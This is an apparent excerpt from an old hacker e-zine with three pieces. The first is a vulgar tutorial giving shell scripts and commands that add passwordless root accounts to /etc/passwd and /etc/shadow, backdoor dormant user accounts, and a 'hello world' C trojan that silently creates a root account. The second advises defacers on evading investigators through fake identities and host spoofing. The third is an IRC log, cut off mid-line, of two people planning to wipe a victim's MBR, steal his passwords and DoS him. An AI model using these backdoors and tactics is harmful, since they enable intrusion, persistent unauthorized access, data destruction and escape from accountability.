shadowing.
This 'shadowing'-technique creates a file called /etc/shadow. This file is
not world readable or anything. This /etc/shadow file contains the
encrypted password. So, let's take a look at an example (I love examples!)
Here's the /etc/passwd file now with shadowing
root:*:0:0:Rewt, Rewt Office, 1-800-GAY-SEX, 1-800-WITH-
DOGS:/root:/bin/bash
What difference to the previous /etc/passwd file do we notice? None. Wrong!
Now instead of the encrypted pass there's a '*'. Now don't go and try
logging in as root with the pass '*'. That's not leet (and it won't work
anyway). So now you wonder where the encrypted pass went? This is where the
/etc/shadow file comes in.
Here's the /etc/shadow file with shadowing (DUH!)
root:lECN8annvOh/M:::::
So what does that mean?
It means that root's encrypted pass is stored in the /etc/shadow file,
which is not world-readable (unless the sysadmin is totally fucked up).
This meaning, that you have to be root to be able to see the encrypted
pass.
Well? Get root!!!
So, now let's edit addleetouser.sh so it works with shadowing.
Newbie note: If you don't make an entry in the /etc/shadow file,
your newly created pass will be put in /etc/passwd.
----Begin copy here----addleetouserwithshadowing.sh---by MagicTux----
#!/bin/sh
if id | grep root then
echo "Enter Login"
read vlogin
echo "Enter UID"
read vuid
echo "Enter GID"
read vgid
echo "Enter Gecos information (name, office, office phone, home phone)
separated by commas"
read vgecos
echo "Enter Home Directory"
read vhome
echo "Enter Shell"
read vshell
echo
echo "Creating account ..."
echo "$vlogin:*:$vuid:$vgid:$vgecos:$vhome:$vshell" >> /etc/passwd
echo "$vlogin::::::" >> /etc/shadow
echo "Finished"
else
echo "You have to run this program as root, you totally fucked up Lamer!"
fi
exit 0
--------Ok, you can stop copying now--------------------
So, if you're leet enough to understand this, you might have noticed that
we only added one line. Not that complicated, eh? Well maybe for you ...
but, you know what I mean. If you're even leeter, you might have even
noticed that the line added was 'echo "$vlogin::::::" >> /etc/shadow. See
explanation for this above, or figure it out yourself. Well, and we added a
- in the echo "$vlogin:*:$vuid:$vgid:$vgecos:$vhome:$vshell" >> /etc/passwd
command, but that doesn't count ;).
Now that you understand all of this stuff with /etc/passwd and /etc/shadow
you can move your eyes down a bit and read part IV.)
(If you didn't understand anything, beat yourself up and reread this far
until you've got it all down.)
=======================================================
IV.) The Fun Part: H4x0ring /etc/passwd and /etc/shadow
=======================================================
So, now that you've learned all sorts of weird shit and stuff about
/etc/passwd and /etc/shadow you wanna find a neat use for them. I don't
suppose, you could be creative and come up with something on your own, so
I'll give you some hints and ideas on what you could do.
Well, let's start out with something scary like 'The Login Backdoor' since
you wanna keep root once you've got it, cause you're a lame script kiddie.
If this sounds scary to you, go jerk off under your blanket and you'll feel
better. Then come back and finish reading this article.
So what exactly is a login backdoor? Actually if you're asking this
question and still haven't come up with a creative answer on your own,
you're quite stupid.
But I'll tell you anyway: A login backdoor is simply where you create a new
account of your own, by typing something like this:
# echo 'magictux:*:0:0:MagicTux, 0wnz, This, b0x:/magictux:/bin/bash' >>
/etc/passwd
ok, 2 things about this command: a) I'm using the '#' prompt, because I'm
leet enough ];->
and because I need to be root to execute that command anyway.
Now we execute this uberleeto command:
# echo 'magictux::::::' >> /etc/shadow
Notice once again the leeto '#' prompt. Also notice, that instead of typing
these stupid commands you could just run the leeto
addleetouserwithshadowing.sh script. But that probably isn't leeto enough
for you!
Well, let's continue with our leeto commands:
# su magictux
# passwd
Yep, we now have installed our login backdoor successfully. We can now
telnet or whatever to our 0wned box and login with our login backdoor
username and the password we just made with that leet passwd command. Now
we can all make bets on how long it's gonna take the sysadmin to notice
someone added a leeto account and hope we might actually get in once
more before getting busted by the FBI ...
A less obvious login backdoor would be to check, which users haven't logged
in for a while (no, not like 3 minutes, more like a few months). Then we
can assume that they probably will never log in again, or think they forgot
their password when they do try.
How we'd do this is, get a list of all logins, then finger them (no, not
the perverted way again; I know this is getting boring, since you're all
horny from reading all this leet stuff) and check when they last logged in.
If it's a good while back, we'd edit the /etc/shadow file (or /etc/passwd,
if shadowing is disabled (which is very unlikely)) and delete the password
of that user. Thus enabling us to type the passwd command and create
a new one for them.
It might look something like this:
# cat /etc/passwd
<SCROLL>
# finger bob (one of those thousand users)
<finger stuff>
Last logged in: Quite a while ago
# bingo
bash: bingo: command not found
# pico /etc/shadow (yes we use pico, because pico 0wnz!!)
<shadow file>
^W bob
bob:abjkle3cjoij3o:::::
and we change that line to
bob::::::
^X
y
<enter>
Congratulations! You stupid ass fuck have just set up an even leeter than
the previous login backdoor. I know that example above was very bad, but
it's getting late and I'm getting all weird. Ok, now be creative and write
a bunch of cool backdoors and exploits and trojans and lotsa other leeto
stuff with /etc/passwd and /etc/shadow.
In closing, I'll present you with what I call the hello-world-passwd-
trojan:
----Begin copy here----hello.c---------by MagicTux----
#include <stdlib.h>
/* For you ignorant fuck, compile with gcc -o hello hello.c and put hello
int root's homedir or sumthin */
void main() {
printf("Hello, World\n");
system("echo 'magictux:*:0:0:magictux,0wnz,j00,!:/magictux:/bin/bash' >>
/etc/passwd'");
system("echo 'magictux::::::' >> /etc/shadow");
}
--------Ok, you can stop copying now--------------------
So compile the program and put it in root's dir or sumthin.
And now we'll assume root is this REAAAAAALLY stupid guy, and he actually
runs your prog.
He gets Hello world printed into his screen and thinks everything's all
right (remember, he's really stupid). So now that this stupid little fuck
actually ran your program, you should be able to login with magictux (no
actually you shouldn't, get an own nick!)without a password prompt.
Enjoy!!! ;)
==============
V.) Conclusion
==============
So, now that you're such a kick ass leeto h4x0r, go pick up the next hot
ch1x0r j00 see and impress her with your leeto echo '' >> bla commands and
stuff. Show her how leet you are and make her a leeto root account. After
you impressed her, fuck her.
Also, you've probably read a thousand guides telling you that you should
pick your password really weird, something like Ac397cjklae27ac.j3+a73.
Don't listen to them, they all suck.
Just have your password have two capital letters and 2 or 3 numbers and
you'll be doing fine.
Have your password something like 7l3eT0Iam (7leetoiam), it's easier to
remember (might not make any sense, but at least you have a word in it) and
still safe. I'm quite sure nobody will guess that.
And anyway if you're totally paranoid or sumthin, get BSD, cause it uses
blowfish instead of DES which is a whole fuckin lot securer. Also you could
maybe set up a tripwire on the /etc/passwd and /etc/shadow files. Well,
maybe you could, probably not because you suck. But you can always
try!
Also, I plan on writing this ultra-secure login and password stuff. It's
gonna use rot13 encryption.
So, wait for it. I'll publish it sometime. I'm gonna write a new login for
linux and stuff, that will use rot13 encryption and a passwd program that
will change your password to a rot13 encrypted one.
Oh yeah, and it's not even going to be shadowed. I tell ya, no one can
crack rot13 ;) Seriously, so after I gave it to you, you'll have to give me
your ip, just so, not that there's any reason ...
Maybe, sometime I'll make this ultra-super-secure login and password stuff
that won't use any encryption and shadowing at all. Man, that would rock!!!
But that'll take a while, until I've made that.
Have fun!
==============================
VI.) The b0g 0wnz j00! Program
==============================
----Begin copy here----b0g0wnzj00.sh---by MagicTux-----
#!/bin/sh
trap 'echo b0g 0wnz j00!' INT
while true
do
echo "b0g 0wnz j00!"
echo -e \\a
done
--------Ok, you can stop copying now--------------------
What does this program do:
It goes into an infinite loop of printing b0g 0wnz j00! and beeping.
It traps ^C so you cannot exit it except for kill -9 <pid>-ing it.
Recommended Uses:
./b0g0wnzj00.sh > tty<ttynumberofannoyingfucker>
./b0g0wnzj00.sh
The author of this article is not responsible for any damage caused
..........
This document is meant for educational purposes only
.........................
];-> <-;[
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
____________________________________________________________________
[ 8:. - [ Counter Hacker Profiling ] [ripped_edge] :. ]
[Ripped_edge@hotmail.com] :. ]
____________________________________________________________________
Some time ago Anti Online posted a piece entitled, "Hacker Profiling" I
read it considered it and then forgot it. Recently ph33r-the-b33r
defacements have taken to addressing this theme.
While they hit some basic points they don't go deep enough into how you can
thwart profilers. So here it is Counter Profiling.
First off lets discus the current method for tracking down and
prosecuting hackers/crackers/script kiddies. One would think that the feds
are hot on the tails of every one who defaces. If you look at the mirrors
and figure a five-man team for each defacer, you suddenly have a huge army
looking for defacers. Of course this is not how it works.
The feds get involved when
1) A company makes a big fuss
2) A company losses a bunch of cash
3) Serious threats are made, or
4) The person keeps on doing it.
So the first step in avoiding hacker profilers is, don't cause monetary
damage, don't piss off the admin too much by deleting everything off the
server, and spread them out. Those people who have blocks of 5 to 10 hacks
all in a row on attrition will gain more fed attention than 10 defacements
spread out over a few months. (Get a life, more than 3 sites in a day and
you have toooo much free time)
Next up: Your IRC habits, they are bad.
People in IRC have no clue who they are talking to. Never tell people where
you live, what you do, who your friends are etc. Create separate dentifies.
For instance, I (Ripped) go by several names. The people, who know me in
real life have no clue that they know Ripped_edge, they know me as some one
else. Nothing connects my identifies.
For example about 6 months ago before I was Ripped I was known as Arkan.
Arkan lived somewhere in Indiana worked for a large networking company, and
was starting college some where around there. None of that is remotely
true. Nothing pertaining to what I tell people I do now with this nick is
remotely true. By covering your tracks you make it that much harder to be
profiled.
Your host name on IRC, lost of ways to fix this. Some people use a free ISP
where they entered bogus names and such, good, but did you bother to check
if they log phone calls? Ouch. Next up spoofing accounts, good and nice
proof of your l33tness, but when you enter a chat room as user@fbi.gov,
profilers know you are spoofing and start working on it. Stolen accounts,
possibly the best, but again make sure the ISP does not log phone calls. My
personal fav is realistic spoofing. Rather that risk stealing an account or
spoofing outrageous host why not spoof something like
user.userid.coolispthatidontuse.com.
The profiles will spend ages talking to that ISP only to find no account
exists, and you in the mean time are gone. One thing to note always be
consistent, spoof the same host every time, else the ruse is up.
Going back to the identify deal. Ideally you have an identity for each
different defacement, a separate identity for IRC, and then a few others
for fun. Never discuss your identifies with friends or any one. Never
discuss your defacements or provide any clues that could link your
identities together. Why people feel the urge to brag about their hacks is
stupid. You'll just get caught faster.
Your friends in this world will not always be your friends. I was sitting
in on one group and collecting information. (Yup, I'm a hax0r profiler
too) There was one member of this group who for the life of me I could not
get any info on. I knew the city he lived in but that was about it. All the
others I had addresses, pictures, phone numbers, the works. Suddenly a huge
rift split the group into two groups and ended up isolating the one member
I had no info about. My chance, which I jumped at and I now had his address
and phone number and picture. A complete list of the entire group, how
nice. Now if he had not told his friends so much about him I would not know
any thing, but now I do. Profilers are more than happy to take advantage of
intra group wars, and they can be quite profitable.
A few other points:
Make sure you know whom bots belong to and don't let other in.
Watch for people who ask a lot of personal questions, and people who
never talk two traits of a profiler. Remember most profilers are NOT feds
but security consultants, they don't have search warrants and ISP don't
help them then, with some Identity shuffling you can thoroughly confuse
these profilers.
Do not discuss you actions with others
No links between online life and offline life
Nothing on your computer should be able to identify you
In Anti online's hacker profiling series they use one example of a person
saying, "I'm off to play quake" as what was needed to break the case. Yup
its true sometimes that's all you need. But lets say you had an identity
that you used on that server that said you went to xyz university and not
the abc one that you really attend. As you�re off to play quake, the
profiler is off to waste time digging through and watching some poor soul
at the wrong university. Lastly remember to keep your identities strait.
Think carefully about whom you are supposed to be and answer (and talk
if you have some dialect studies under your belt) accordingly. If you do
confuse them and start confusing people, remember it's better for them
to be confused with all sorts of erroneous info than to have the right
info.
And keep your mouths shut about your hacks. It makes my job too easy, and I
need a challenge. (The whole point of me writing this)
Ripped_edge
ripped_edge@hotmail.com
h0h0h0 ph33r the h0tmail hax0r
Ph33r-the-b34r forever!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
____________________________________________________________________
[ 9:. - [ rap Vs the viruscoders part 2! ] [evul] :. ]
[evul@coderz.net] :. ]
____________________________________________________________________
Start of Evul buffer: Mon Aug 14 01:45:23 2000
Session Ident: Evul
[01:02] <^mdrg^> so ?
[01:02] <^mdrg^> what should i do ?
[01:03] <Evul> about ?
[01:03] <Evul> rupture ?
[01:03] <Evul> got a gun ?
[01:03] <^mdrg^> i'm on his HD
[01:03] <Evul> rm -r
[01:03] <Evul> he deserves it
[01:03] <^mdrg^> u missed the /msg while cycling
[01:03] <Evul> =]
[01:03] <Evul> I was too lagged to talk to any one
[01:04] <^mdrg^> hmmm.. what about cih 1.5 ?
[01:04] <^mdrg^> w/ bios erasing
[01:04] <^mdrg^> and mbr murder
[01:04] <Evul> hehehe
[01:04] <^mdrg^> i'd better steal his passes
[01:04] <^mdrg^> logs, and so on
[01:05] <Evul> kill him ..
[01:05] <^mdrg^> then trojanise the sucker
[01:05] <Evul> =]
[01:05] * ^mdrg^ is definitively a bad boy
[01:05] <Evul> no no
[01:05] <^mdrg^> he'll know the spicekill nightmare
[01:05] <Evul> thats a good thing
[01:06] <Evul> if any fuck in this world deserves it .. tis him
[01:06] <^mdrg^> i never done this b4
[01:06] <^mdrg^> wipin a whole HD
[01:06] <Evul> I figure you havent .. but what the fuck
[01:06] <Evul> =]
[01:06] <^mdrg^> there'z a first time for everything
[01:07] <^mdrg^> the sucker has lame toolz
[01:07] <Evul> hehehe
[01:10] * Evul is waiting "...EOF From client."
[01:10] <Evul> hehehe
[01:10] <^mdrg^> hehe
[01:10] <^mdrg^> [.] [..]
[01:10] <^mdrg^> [Common Files] [Plus!]
[01:10] <^mdrg^> [CHAT] [Web Publish]
[01:10] <^mdrg^> [DIRECTX] [REAL]
[01:10] <^mdrg^> [NetMeeting] [Accessories]
[01:10] <^mdrg^> [Internet Explorer] [FrontPage Express]
[01:10] <^mdrg^> [Outlook Express] [Online Services]
[01:10] <^mdrg^> [Norton AntiVirus] [Creative]
[01:10] <^mdrg^> [ICQ] [Winamp]
[01:10] <^mdrg^> [GetRight] [WindowsUpdate]
[01:10] <^mdrg^> [WinZip] [MSMQ]
[01:10] <^mdrg^> [AgateSoft]
[01:11] <^mdrg^> gay appz
[01:11] <^mdrg^> [SnadBoy Software] [Ogre]
[01:11] <^mdrg^> [WhatsUp2] [Rio]
[01:11] <^mdrg^> [MediaScience] [Legion]
[01:11] <^mdrg^> [Signal9] [MSN Gaming Zone]
[01:11] <^mdrg^> [MicroProse] [DBG_Setup]
[01:11] <^mdrg^> [Windows Media Player] [Symantec]
[01:11] <^mdrg^> [FasaInteractive] [Logitech]
[01:11] <^mdrg^> [BlackWidow] [Diamond]
[01:11] <^mdrg^> [Black Isle] [Activision]
[01:11] <^mdrg^> [Championship Manager 99-00] [Diablo II]
[01:11] <^mdrg^> i'll have to disco n reconnect in 5 mins :(
[01:11] <Evul> BLOW HIM UP!
[01:11] <Evul> hehehe
[01:14] <Evul> hold up
[01:14] <Evul> shit he is running av
[01:14] <Evul> =\
[01:14] <Evul> this is detectred
[01:15] <Evul> let him test that =P
[01:16] <^mdrg^> wassat ?
[01:16] <Evul> win32 infector
[01:16] <^mdrg^> nah..
[01:16] <^mdrg^> i want to nuke his MBR
[01:17] <Evul> I can code that in 2 minutes
[01:21] <^mdrg^> u're @ work ?
[01:23] <Evul> HEY
[01:23] <Evul> I was done before yu left
[01:23] <Evul> =P
[01:24] <^mdrg^> i wuz plannin to use debug
[01:24] <Evul> careful with that
[01:24] <Evul> =]
[01:24] <^mdrg^> to write to the sectorz
[01:24] <^mdrg^> don't worry ;)
[01:24] <Evul> thats 18 bytes of death
[01:24] <Evul> =P
[01:25] <^mdrg^> E:\>type autoexec.bat
[01:25] <^mdrg^> @ECHO OFF
[01:25] <^mdrg^> mbr
[01:25] <^mdrg^> SET SBPCI=C:\SBPCI
[01:25] <^mdrg^> SET BLASTER=A220 I7 D1 H7 P330 T6
[01:25] <^mdrg^> SET SNDSCAPE=C:\WINDOWS
[01:25] <^mdrg^> PATH=C:\WINDOWS
[01:25] <^mdrg^> mode con codepage prepare=((850)
c:\windows\COMMAND\ega.cpi)
[01:25] <^mdrg^> mode con codepage select=850
[01:25] <^mdrg^> keyb uk,,c:\windows\COMMAND\keyboard.sys
[01:25] <^mdrg^> @C:\PROGRA~1\NORTON~1\NAVDX.EXE /Startup
[01:25] <^mdrg^> path "%path%;C:\Perl\bin;"
[01:25] <^mdrg^> now.. we have to make him reboot
[01:26] <Evul> thats easy enuff ..
[01:26] <Evul> cant ya send command "exitwin" ?
[01:26] <^mdrg^> i can only read and write to his HD
[01:27] <^mdrg^> so i put ur proggy in \ and placed the cmd in autoexec.bat
[01:27] <Evul> =]
[01:27] <Evul> ya man
[01:27] <Evul> then he gets one more session
[01:27] <^mdrg^> i'm DoSing him
[01:27] <Evul> I *could* fix the prog to hang up after nuking the MBR
[01:27] <^mdrg^> right know
[01:27] <Evul> so then he wont get back to OS
[01:27] <Evul> =]
[01:28] <^mdrg^> nah
[01:28] <^mdrg^> i just DoS him so he'll have to reboot
[01:28] <^mdrg^> but if ur proggy is ok, he won't come back
[01:29] <Evul> after reboot . he will have one more windows session
[01:29] <Evul> cause the disk will boot before the program runs
[01:29] <Evul> the next reboot will fail
[01:29] <Evul> but its too late then .. damage done
[01:29] <^mdrg^> add a 'jmp